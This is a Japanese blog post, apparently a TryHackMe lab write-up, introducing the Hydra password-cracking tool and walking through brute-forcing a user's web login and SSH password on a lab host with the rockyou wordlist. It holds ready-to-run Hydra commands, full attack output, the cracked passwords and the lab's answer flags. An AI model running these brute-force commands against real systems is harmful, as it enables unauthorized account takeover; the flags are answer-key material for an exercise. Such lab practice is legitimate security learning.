0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

Hydra とはなんぞや

Last updated at Posted at 2025-02-28

image.png

Hydra とは

Hydraは、オンラインのパスワードをゴリゴリ brute force で確認するツール。システムログインとか、ウェブの認証とか、いろんなサービスでパスワードを力技で見つけ出すことが可能。

対応してるサービスはめちゃくちゃ多く、公式情報によると、ざっとこんな感じ。

“Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, 
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, 
HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-
Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, 
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, 
Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, 
SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak 
(TS2), Telnet, VMware-Auth, VNC and XMPP.”

コマンド例

ftp を bruteforce
hydra -l <username> -P passlist.txt ftp://10.10.124.89

ssh を bruteforce
hydra -l <username> -P <full path to pass> 10.10.124.89 -t 4 ssh

フォームを bruteforce
hydra -l <username> -P <wordlist> 10.10.124.89 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

チャレンジ

Use Hydra to bruteforce molly's web password. What is flag 1?

ウェブフォームのページなので、そのまま以下のコマンドでトライ

┌──(kali㉿kali)-[~]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.124.89 
http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

結果はこれ

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-04 19:58:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.124.89:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "ashley" - 19 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "qwerty" - 20 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "111111" - 21 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "iloveu" - 22 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "000000" - 23 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "michelle" - 24 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "tigger" - 25 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "sunshine" - 26 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "chocolate" - 27 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "password1" - 28 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "soccer" - 29 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "anthony" - 30 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "friends" - 31 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "butterfly" - 32 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "purple" - 33 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "angel" - 34 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jordan" - 35 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "liverpool" - 36 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "justin" - 37 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "loveme" - 38 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "123123" - 40 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "football" - 41 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "secret" - 42 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "andrea" - 43 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "carlos" - 44 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "jennifer" - 45 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.124.89 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.124.89   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-04 19:58:56

sunshine とのこなので login すると

image.png

A: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly's SSH password. What is flag 2?

ユーザー名はすでに molly であることがわかっているので、
よく使われている rockyou.txt を利用して bruteforce

今回は試しに ssh_result.txt に出力

──(kali㉿kali)-[~]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.124.89 -t 4 ssh > ssh_result.txt        

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-04 20:08:26
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.124.89:22/
[22][ssh] host: 10.10.124.89   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-04 20:08:57

けっかは butterfly

┌──(kali㉿kali)-[~]
└─$ ssh molly@10.10.124.89
molly@10.10.124.89's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
32 updates are security updates.

Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-124-89:~$ ls
flag2.txt
molly@ip-10-10-124-89:~$ cat flag2.txt 
THM{c8eeb0468febbadea859baeb33b2541b}
molly@ip-10-10-124-89:~$ 

A: THM{c8eeb0468febbadea859baeb33b2541b}

終えて

使い方はわりかしシンプルであるにもかかわらず、かなり強力なツールの印象でした。
ただ、bruteforce 対策がされているサイトやシステムだと場合によっては活用は微妙そう

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?